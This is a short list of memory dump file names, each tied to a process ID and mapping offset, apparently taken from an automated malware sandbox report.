- memory/3560-149-0x0000000000000000-mapping.dmp
- memory/3572-152-0x0000000000000000-mapping.dmp
- memory/3616-185-0x0000000000000000-mapping.dmp
- memory/3664-151-0x0000000000000000-mapping.dmp
- memory/4036-164-0x0000000000000000-mapping.dmp
- memory/4060-169-0x0000000000000000-mapping.dmp
- memory/4208-133-0x0000000000000000-mapping.dmp
- memory/4240-143-0x0000000000000000-mapping.dmp
- memory/4296-191-0x0000000000000000-mapping.dmp
- memory/4332-161-0x0000000000000000-mapping.dmp
- memory/4336-155-0x0000000000000000-mapping.dmp
- memory/4392-193-0x0000000000000000-mapping.dmp
- memory/4408-178-0x0000000000000000-mapping.dmp
- memory/4776-186-0x0000000000000000-mapping.dmp
- memory/4840-140-0x0000000000000000-mapping.dmp
- memory/4844-188-0x0000000000000000-mapping.dmp
- memory/4860-187-0x0000000000000000-mapping.dmp
- memory/4892-183-0x0000000000000000-mapping.dmp
- memory/4904-135-0x0000000000000000-mapping.dmp
- memory/4928-136-0x0000000000000000-mapping.dmp
- memory/4940-189-0x0000000000000000-mapping.dmp
- memory/4952-170-0x0000000000000000-mapping.dmp
- memory/4956-134-0x0000000000000000-mapping.dmp
- memory/5076-139-0x0000000000000000-mapping.dmp
- memory/5100-165-0x0000000000000000-mapping.dmp
- memory/5104-154-0x0000000000000000-mapping.dmp
- memory/5116-160-0x0000000000000000-mapping.dmp